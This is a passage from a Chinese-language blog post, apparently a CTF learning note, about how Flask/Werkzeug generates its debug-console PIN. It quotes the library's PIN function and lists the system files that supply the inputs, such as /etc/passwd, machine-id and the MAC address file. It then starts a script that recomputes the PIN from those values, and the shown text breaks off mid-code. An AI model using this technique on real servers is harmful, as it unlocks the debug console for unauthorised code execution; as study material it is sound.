

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/lucy.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="鱿鱼">
  <meta name="keywords" content="">
  
    <meta name="description" content="在做新生赛的时候遇到了个与pin码有关的题目，当时挺想知道为什么是&#x2F;console路径，通过看文章，别人指导，这里就写一篇文章记录一下">
<meta property="og:type" content="article">
<meta property="og:title" content="flask debug 模式下的pin码">
<meta property="og:url" content="http://example.com/2024/09/20/flask-debug-%E6%A8%A1%E5%BC%8F%E4%B8%8B%E7%9A%84pin%E7%A0%81/index.html">
<meta property="og:site_name" content="squid1LLL">
<meta property="og:description" content="在做新生赛的时候遇到了个与pin码有关的题目，当时挺想知道为什么是&#x2F;console路径，通过看文章，别人指导，这里就写一篇文章记录一下">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/11.png">
<meta property="og:image" content="http://example.com/img/22.png">
<meta property="og:image" content="http://example.com/img/33.png">
<meta property="og:image" content="http://example.com/img/44.png">
<meta property="article:published_time" content="2024-09-20T02:23:25.000Z">
<meta property="article:modified_time" content="2024-11-03T13:23:51.035Z">
<meta property="article:author" content="鱿鱼">
<meta property="article:tag" content="note">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/img/11.png">
  
  
  
  <title>flask debug 模式下的pin码 - squid1LLL</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":50,"cursorChar":"*","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":false,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":"NspbmfZxbZKiA8WtZztA4utZ-gzGzoHsz","app_key":"Bley809j6xSm4e5hV132okkC","server_url":"https://nspbmfzx.lc-cn-n1-shared.com","path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  
    
  



  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 75vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>鱿鱼</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>文章</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>鱿鱼</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/cyb.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="flask debug 模式下的pin码"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-09-20 10:23" pubdate>
          2024年9月20日 上午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.8k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          16 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span>次
        </span>
        
      
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">flask debug 模式下的pin码</h1>
            
            
              <div class="markdown-body">
                
                <h3 id="pin码是什么"><a href="#pin码是什么" class="headerlink" title="pin码是什么"></a>pin码是什么</h3><h4 id="PIN是-Werkzeug（它是-Flask-的依赖项之一）提供的额外安全措施，以防止在不知道-PIN-的情况下访问调试器。"><a href="#PIN是-Werkzeug（它是-Flask-的依赖项之一）提供的额外安全措施，以防止在不知道-PIN-的情况下访问调试器。" class="headerlink" title="PIN是 Werkzeug（它是 Flask 的依赖项之一）提供的额外安全措施，以防止在不知道 PIN 的情况下访问调试器。"></a>PIN是 Werkzeug（它是 Flask 的依赖项之一）提供的额外安全措施，以防止在不知道 PIN 的情况下访问调试器。</h4><h4 id="flask在debug模式下会生成一个叫pin码的东西，就是一个安全层的作用，用于debug模式下的身份验证"><a href="#flask在debug模式下会生成一个叫pin码的东西，就是一个安全层的作用，用于debug模式下的身份验证" class="headerlink" title="flask在debug模式下会生成一个叫pin码的东西，就是一个安全层的作用，用于debug模式下的身份验证"></a>flask在debug模式下会生成一个叫pin码的东西，就是一个安全层的作用，用于debug模式下的身份验证</h4><h3 id="为什么是-console路径"><a href="#为什么是-console路径" class="headerlink" title="为什么是&#x2F;console路径"></a>为什么是&#x2F;console路径</h3><h4 id="这是一个实例代码"><a href="#这是一个实例代码" class="headerlink" title="这是一个实例代码"></a>这是一个实例代码</h4><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-keyword">from</span> flask import Flask<br><br>app = Flask(__name__)<br><br><br>@app.route(<span class="hljs-string">&quot;/&quot;</span>)<br>def hello():<br>    return <span class="hljs-string">&#x27;HelloWorld&#x27;</span><br><br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&quot;__main__&quot;</span>:<br>    app.<span class="hljs-built_in">run</span>(<span class="hljs-attribute">host</span>=<span class="hljs-string">&quot;0.0.0.0&quot;</span>, <span class="hljs-attribute">port</span>=8080, <span class="hljs-attribute">debug</span>=<span class="hljs-literal">True</span>)<br><br></code></pre></td></tr></table></figure>

<h4 id="然后就是一个一直找的过程，首先从app-run的app进入到flask-app-py里面，然后我们知道PIN是-Werkzeug（它是-Flask-的依赖项之一）提供的额外安全措施，找到Werkzeug，并且就是导入了run-simple-我们继续看进去"><a href="#然后就是一个一直找的过程，首先从app-run的app进入到flask-app-py里面，然后我们知道PIN是-Werkzeug（它是-Flask-的依赖项之一）提供的额外安全措施，找到Werkzeug，并且就是导入了run-simple-我们继续看进去" class="headerlink" title="然后就是一个一直找的过程，首先从app.run的app进入到flask&#x2F;app.py里面，然后我们知道PIN是 Werkzeug（它是 Flask 的依赖项之一）提供的额外安全措施，找到Werkzeug，并且就是导入了run_simple,我们继续看进去"></a>然后就是一个一直找的过程，首先从app.run的app进入到flask&#x2F;app.py里面，然后我们知道PIN是 Werkzeug（它是 Flask 的依赖项之一）提供的额外安全措施，找到Werkzeug，并且就是导入了run_simple,我们继续看进去</h4><h4 id=""><a href="#" class="headerlink" title=""></a><img src="/img/11.png" srcset="/img/loading.gif" lazyload></h4><h4 id="进入到serving-py里面，有一个对use-debugger的定义，向下找到use-debugger"><a href="#进入到serving-py里面，有一个对use-debugger的定义，向下找到use-debugger" class="headerlink" title="进入到serving.py里面，有一个对use_debugger的定义，向下找到use_debugger"></a>进入到serving.py里面，有一个对use_debugger的定义，向下找到use_debugger</h4><h4 id="-1"><a href="#-1" class="headerlink" title=""></a><img src="/img/22.png" srcset="/img/loading.gif" lazyload></h4><h4 id="-2"><a href="#-2" class="headerlink" title=""></a><img src="/img/33.png" srcset="/img/loading.gif" lazyload></h4><h4 id="在进入DebuggedApplication模块，就能看到，这里定义了console-path"><a href="#在进入DebuggedApplication模块，就能看到，这里定义了console-path" class="headerlink" title="在进入DebuggedApplication模块，就能看到，这里定义了console_path"></a>在进入DebuggedApplication模块，就能看到，这里定义了console_path</h4><h4 id="-3"><a href="#-3" class="headerlink" title=""></a><img src="/img/44.png" srcset="/img/loading.gif" lazyload></h4><h3 id="pin码的生成"><a href="#pin码的生成" class="headerlink" title="pin码的生成"></a>pin码的生成</h3><h4 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h4><h5 id="【我找的那篇参考文章（文章等下会贴在下面）其实重点是分析pin码的生成，正好，又学到了】"><a href="#【我找的那篇参考文章（文章等下会贴在下面）其实重点是分析pin码的生成，正好，又学到了】" class="headerlink" title="【我找的那篇参考文章（文章等下会贴在下面）其实重点是分析pin码的生成，正好，又学到了】"></a>【我找的那篇参考文章（文章等下会贴在下面）其实重点是分析pin码的生成，正好，又学到了】</h5><h5 id="在DebuggedApplication模块有个模块是get-pin-and-cookie-name"><a href="#在DebuggedApplication模块有个模块是get-pin-and-cookie-name" class="headerlink" title="在DebuggedApplication模块有个模块是get_pin_and_cookie_name"></a>在DebuggedApplication模块有个模块是get_pin_and_cookie_name</h5><h5 id="这里把它贴出来"><a href="#这里把它贴出来" class="headerlink" title="这里把它贴出来"></a>这里把它贴出来</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">def</span> <span class="hljs-title function_">get_pin_and_cookie_name</span>(<span class="hljs-params"></span><br><span class="hljs-params">    app: WSGIApplication,</span><br><span class="hljs-params"></span>) -&gt; <span class="hljs-built_in">tuple</span>[<span class="hljs-built_in">str</span>, <span class="hljs-built_in">str</span>] | <span class="hljs-built_in">tuple</span>[<span class="hljs-literal">None</span>, <span class="hljs-literal">None</span>]:<br>    <span class="hljs-string">&quot;&quot;&quot;Given an application object this returns a semi-stable 9 digit pin</span><br><span class="hljs-string">    code and a random key.  The hope is that this is stable between</span><br><span class="hljs-string">    restarts to not make debugging particularly frustrating.  If the pin</span><br><span class="hljs-string">    was forcefully disabled this returns `None`.</span><br><span class="hljs-string"></span><br><span class="hljs-string">    Second item in the resulting tuple is the cookie name for remembering.</span><br><span class="hljs-string">    &quot;&quot;&quot;</span><br>    pin = os.environ.get(<span class="hljs-string">&quot;WERKZEUG_DEBUG_PIN&quot;</span>)<br>    rv = <span class="hljs-literal">None</span><br>    num = <span class="hljs-literal">None</span><br><br>    <span class="hljs-comment"># Pin was explicitly disabled</span><br>    <span class="hljs-keyword">if</span> pin == <span class="hljs-string">&quot;off&quot;</span>:<br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">None</span>, <span class="hljs-literal">None</span><br><br>    <span class="hljs-comment"># Pin was provided explicitly</span><br>    <span class="hljs-keyword">if</span> pin <span class="hljs-keyword">is</span> <span class="hljs-keyword">not</span> <span class="hljs-literal">None</span> <span class="hljs-keyword">and</span> pin.replace(<span class="hljs-string">&quot;-&quot;</span>, <span class="hljs-string">&quot;&quot;</span>).isdecimal():<br>        <span class="hljs-comment"># If there are separators in the pin, return it directly</span><br>        <span class="hljs-keyword">if</span> <span class="hljs-string">&quot;-&quot;</span> <span class="hljs-keyword">in</span> pin:<br>            rv = pin<br>        <span class="hljs-keyword">else</span>:<br>            num = pin<br><br>    modname = <span class="hljs-built_in">getattr</span>(app, <span class="hljs-string">&quot;__module__&quot;</span>, t.cast(<span class="hljs-built_in">object</span>, app).__class__.__module__)<br>    username: <span class="hljs-built_in">str</span> | <span class="hljs-literal">None</span><br><br>    <span class="hljs-keyword">try</span>:<br>        <span class="hljs-comment"># getuser imports the pwd module, which does not exist in Google</span><br>        <span class="hljs-comment"># App Engine. It may also raise a KeyError if the UID does not</span><br>        <span class="hljs-comment"># have a username, such as in Docker.</span><br>        username = getpass.getuser()<br>    <span class="hljs-keyword">except</span> (ImportError, KeyError):<br>        username = <span class="hljs-literal">None</span><br><br>    mod = sys.modules.get(modname)<br><br>    <span class="hljs-comment"># This information only exists to make the cookie unique on the</span><br>    <span class="hljs-comment"># computer, not as a security feature.</span><br>    probably_public_bits = [<br>        username,<br>        modname,<br>        <span class="hljs-built_in">getattr</span>(app, <span class="hljs-string">&quot;__name__&quot;</span>, <span class="hljs-built_in">type</span>(app).__name__),<br>        <span class="hljs-built_in">getattr</span>(mod, <span class="hljs-string">&quot;__file__&quot;</span>, <span class="hljs-literal">None</span>),<br>    ]<br><br>    <span class="hljs-comment"># This information is here to make it harder for an attacker to</span><br>    <span class="hljs-comment"># guess the cookie name.  They are unlikely to be contained anywhere</span><br>    <span class="hljs-comment"># within the unauthenticated debug page.</span><br>    private_bits = [<span class="hljs-built_in">str</span>(uuid.getnode()), get_machine_id()]<br><br>    h = hashlib.sha1()<br>    <span class="hljs-keyword">for</span> bit <span class="hljs-keyword">in</span> chain(probably_public_bits, private_bits):<br>        <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> bit:<br>            <span class="hljs-keyword">continue</span><br>        <span class="hljs-keyword">if</span> <span class="hljs-built_in">isinstance</span>(bit, <span class="hljs-built_in">str</span>):<br>            bit = bit.encode()<br>        h.update(bit)<br>    h.update(<span class="hljs-string">b&quot;cookiesalt&quot;</span>)<br><br>    cookie_name = <span class="hljs-string">f&quot;__wzd<span class="hljs-subst">&#123;h.hexdigest()[:<span class="hljs-number">20</span>]&#125;</span>&quot;</span><br><br>    <span class="hljs-comment"># If we need to generate a pin we salt it a bit more so that we don&#x27;t</span><br>    <span class="hljs-comment"># end up with the same value and generate out 9 digits</span><br>    <span class="hljs-keyword">if</span> num <span class="hljs-keyword">is</span> <span class="hljs-literal">None</span>:<br>        h.update(<span class="hljs-string">b&quot;pinsalt&quot;</span>)<br>        num = <span class="hljs-string">f&quot;<span class="hljs-subst">&#123;<span class="hljs-built_in">int</span>(h.hexdigest(), <span class="hljs-number">16</span>):09d&#125;</span>&quot;</span>[:<span class="hljs-number">9</span>]<br><br>    <span class="hljs-comment"># Format the pincode in groups of digits for easier remembering if</span><br>    <span class="hljs-comment"># we don&#x27;t have a result yet.</span><br>    <span class="hljs-keyword">if</span> rv <span class="hljs-keyword">is</span> <span class="hljs-literal">None</span>:<br>        <span class="hljs-keyword">for</span> group_size <span class="hljs-keyword">in</span> <span class="hljs-number">5</span>, <span class="hljs-number">4</span>, <span class="hljs-number">3</span>:<br>            <span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(num) % group_size == <span class="hljs-number">0</span>:<br>                rv = <span class="hljs-string">&quot;-&quot;</span>.join(<br>                    num[x : x + group_size].rjust(group_size, <span class="hljs-string">&quot;0&quot;</span>)<br>                    <span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>, <span class="hljs-built_in">len</span>(num), group_size)<br>                )<br>                <span class="hljs-keyword">break</span><br>        <span class="hljs-keyword">else</span>:<br>            rv = num<br><br>    <span class="hljs-keyword">return</span> rv, cookie_name<br><br></code></pre></td></tr></table></figure>

<figure class="highlight arcade"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs arcade"><span class="hljs-number">1.</span>获取环境变量：<br>函数首先从环境变量 WERKZEUG_DEBUG_PIN 中获取 PIN 码。<br>如果 PIN 码被显式设置为 <span class="hljs-string">&quot;off&quot;</span>，则函数立即返回 (<span class="hljs-built_in">None</span>, <span class="hljs-built_in">None</span>)，表示 PIN 码被禁用。<br><span class="hljs-number">2.</span>解析 PIN 码：<br>如果环境变量中提供了 PIN 码，并且该 PIN 码（去除任何 - 分隔符后）仅包含数字，则函数会尝试使用该 PIN 码。<br>如果 PIN 码包含 - 分隔符，则直接使用该 PIN 码作为 rv（返回的 PIN 码字符串）。<br>如果 PIN 码不包含 - 分隔符，则将其存储在 num 变量中，以便后续处理。<br><span class="hljs-number">3.</span>获取应用和用户信息：<br>函数从 app 对象中获取模块名、应用名等信息。<br>尝试获取当前用户名，但如果环境不支持（如 Google App Engine）或无法获取用户名（如 Docker 容器），则用户名将设置为 <span class="hljs-built_in">None</span>。<br><span class="hljs-number">4.</span>准备 cookie 名称的生成信息：<br>公开信息（probably_public_bits）包括用户名、模块名、应用名和模块文件路径。<br>私有信息（private_bits）包括机器的 MAC 地址和机器 ID（后者可能是一个自定义函数）。<br><span class="hljs-number">5.</span>生成 cookie 名称：<br>使用 SHA<span class="hljs-number">-1</span> 哈希算法，将公开和私有信息编码为字节串并更新哈希对象。<br>添加一个固定的盐值 <span class="hljs-string">&quot;cookiesalt&quot;</span>。<br>根据哈希对象的十六进制摘要的前 <span class="hljs-number">20</span> 个字符，生成 cookie 名称，前缀为 <span class="hljs-string">&quot;__wzd&quot;</span>。<br><span class="hljs-number">6.</span>生成 PIN 码（如果需要）：<br>如果之前没有从环境变量中获取到有效的 PIN 码（即 num 为 <span class="hljs-built_in">None</span>），则通过更新哈希对象并添加一个额外的盐值 <span class="hljs-string">&quot;pinsalt&quot;</span> 来生成一个新的 PIN 码。<br>将生成的哈希值转换为整数，并格式化为一个 <span class="hljs-number">9</span> 位的数字字符串。<br><span class="hljs-number">7.</span>格式化 PIN 码：<br>如果之前没有从环境变量中获取到带有分隔符的 PIN 码（即 rv 为 <span class="hljs-built_in">None</span>），则尝试将生成的 <span class="hljs-number">9</span> 位数字字符串按照不同的分组大小（<span class="hljs-number">5</span>、<span class="hljs-number">4</span>、<span class="hljs-number">3</span>）进行格式化，并在每组数字之间添加 - 分隔符，以便于记忆。<br>如果无法找到合适的分组大小，则直接使用未格式化的数字字符串作为 PIN 码。<br><span class="hljs-number">8.</span>返回结果：<br>函数最终返回一个元组 (rv, cookie_name)，其中 rv 是格式化后的 PIN 码字符串（或 <span class="hljs-built_in">None</span>，如果 PIN 码被禁用或无法生成），cookie_name 是生成的 cookie 名称。<br></code></pre></td></tr></table></figure>

<h5 id="上面是这个函数的流程分析，其实环境变量是重要的，PIN是从环境变量读取的，"><a href="#上面是这个函数的流程分析，其实环境变量是重要的，PIN是从环境变量读取的，" class="headerlink" title="上面是这个函数的流程分析，其实环境变量是重要的，PIN是从环境变量读取的，"></a>上面是这个函数的流程分析，其实环境变量是重要的，PIN是从环境变量读取的，</h5><h5 id="如果没设置环境变量，PIN的生成依赖于username-appname-modname-moddir-uuidnode-machine-id"><a href="#如果没设置环境变量，PIN的生成依赖于username-appname-modname-moddir-uuidnode-machine-id" class="headerlink" title="如果没设置环境变量，PIN的生成依赖于username appname modname moddir uuidnode machine_id"></a>如果没设置环境变量，PIN的生成依赖于username appname modname moddir uuidnode machine_id</h5><h4 id="读取方式："><a href="#读取方式：" class="headerlink" title="读取方式："></a>读取方式：</h4><figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs gradle">username<br>通过getpass.getuser()读取，通过文件读取<span class="hljs-regexp">/etc/</span>passwd<br><br>modname<br>通过getattr(mod,“<span class="hljs-keyword">file</span>”,None)读取，默认值为flask.app<br><br>appname<br>通过getattr(app,“name”,type(app).name)读取，默认值为Flask<br><br>moddir<br>当前网络的mac地址的十进制数，通过getattr(mod,“<span class="hljs-keyword">file</span>”,None)读取实际应用中通过报错读取<br><br>uuidnode<br>通过uuid.getnode()读取，通过文件<span class="hljs-regexp">/sys/</span><span class="hljs-keyword">class</span><span class="hljs-regexp">/net/</span>eth0/address得到<span class="hljs-number">16</span>进制结果，转化为<span class="hljs-number">10</span>进制进行计算<br><br>machine_id<br>每一个机器都会有自已唯一的id，machine_id由三个合并(docker就后两个)：<span class="hljs-number">1</span>.<span class="hljs-regexp">/etc/m</span>achine-id <span class="hljs-number">2</span>.<span class="hljs-regexp">/proc/</span>sys<span class="hljs-regexp">/kernel/</span>random<span class="hljs-regexp">/boot_id 3./</span>proc<span class="hljs-regexp">/self/</span>cgroup<br></code></pre></td></tr></table></figure>

<h4 id="生成算法"><a href="#生成算法" class="headerlink" title="生成算法"></a>生成算法</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> hashlib<br><span class="hljs-keyword">from</span> itertools <span class="hljs-keyword">import</span> chain<br>​<br>probably_public_bits = [<br>    <span class="hljs-string">&#x27;root&#x27;</span>,  <span class="hljs-comment"># username</span><br>    <span class="hljs-string">&#x27;flask.app&#x27;</span>,  <span class="hljs-comment"># modname</span><br>    <span class="hljs-string">&#x27;Flask&#x27;</span>,  <span class="hljs-comment"># getattr(app, &#x27;__name__&#x27;, getattr(app.__class__, &#x27;__name__&#x27;))</span><br>    <span class="hljs-string">&#x27;/usr/local/lib/python3.7/site-packages/flask/app.py&#x27;</span>  <span class="hljs-comment"># getattr(mod, &#x27;__file__&#x27;, None),</span><br>]<br>​<br><span class="hljs-comment"># This information is here to make it harder for an attacker to</span><br><span class="hljs-comment"># guess the cookie name.  They are unlikely to be contained anywhere</span><br><span class="hljs-comment"># within the unauthenticated debug page.</span><br>private_bits = [<br>    <span class="hljs-string">&#x27;2485377957890&#x27;</span>,  <span class="hljs-comment"># str(uuid.getnode()),  /sys/class/net/ens33/address</span><br>    <span class="hljs-comment"># Machine Id: /etc/machine-id + /proc/sys/kernel/random/boot_id + /proc/self/cgroup</span><br>    <span class="hljs-string">&#x27;861c92e8075982bcac4a021de9795f6e3291673c8c872ca3936bcaa8a071948b&#x27;</span><br>]<br>​<br>h = hashlib.sha1()<br><span class="hljs-keyword">for</span> bit <span class="hljs-keyword">in</span> chain(probably_public_bits, private_bits):<br>    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> bit:<br>        <span class="hljs-keyword">continue</span><br>    <span class="hljs-keyword">if</span> <span class="hljs-built_in">isinstance</span>(bit, <span class="hljs-built_in">str</span>):<br>        bit = bit.encode(<span class="hljs-string">&quot;utf-8&quot;</span>)<br>    h.update(bit)<br>h.update(<span class="hljs-string">b&quot;cookiesalt&quot;</span>)<br>​<br>cookie_name = <span class="hljs-string">f&quot;__wzd<span 